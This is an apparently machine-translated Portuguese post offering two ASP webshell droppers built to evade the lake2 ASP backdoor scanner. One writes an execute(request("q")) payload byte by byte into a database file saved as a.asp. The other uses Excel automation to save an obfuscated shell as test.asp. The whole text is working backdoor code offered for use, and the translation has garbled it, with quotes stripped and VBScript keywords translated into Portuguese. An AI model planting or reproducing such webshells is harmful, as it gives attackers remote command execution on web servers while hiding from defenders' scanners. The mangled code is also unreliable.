Dois Trojans ASP não convencionais foram escritos por hanxiaolian para evitar o assistente de gerenciamento de webmasters lake2 ASP
Escrito para evitar o assistente de gerenciamento de webmaster lake2 ASP ...
1. Um pônei que contorna a varredura do Trojan lake2 Asp
Copie o código do código da seguinte forma:
<%
definir c = CreateObject (ADOX.Catalog)
c.create(Provider=Microsoft.Jet.OLEDB.4.0;Fonte de dados=&Server.MapPath(a.asp))
definir c = Nada
c&Server.MapPath(a.asp)
definir conn=server.createobject(Adodb.Connection)
conn.open connstr
conn.execute(criar tabela nomm(nomuma oleobject))
definir rs=server.createobject(adodb.recordset)
sql=SELECT * FROM nome
rs.open sql,conn,1,3
rs.addnew
rs (nomuma).appendchunk(chrB(asc(<))&chrB(asc(%))&chrB(asc (e))&chrB
(asc(x))&chrB(asc(e))&chrB(asc(c))&chrB(asc (u))&chrB(asc(t))&chrB(asc
(e))&chrB(asc(+))&chrB(asc (r))&chrB(asc(e))&chrB(asc(q))&chrB(asc
(u))&chrB(asc (e))&chrB(asc(s))&chrB(asc(t))&chrB(asc(())&chrB(34)
&chrB(asc(q))&chrB(34)&chrB(asc()))&chrB(asc(%))& chrB(asc(>)))
rs.atualização
rs.fechar
definir rs = nada
conexão.fechar
definir conn = nada
%>
Versão 2.xls asp webshell
Copie o código do código da seguinte forma:
<%
Definir xlA = Server.CreateObject(Excel.Application)
xlA.Visible = Falso
xlA.Workbooks.Adicionar
Definir xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = <%ex&ec&ute(request(q))+chr(37)+>
'strArquivo = d:/teste.asp
strArquivo = Servidor.MapPath(teste.asp)
xlWorkSheet.SaveAs strFile
xlA.Sair
Definir xlWorksheet = Nada
Definir xlA = Nada
%>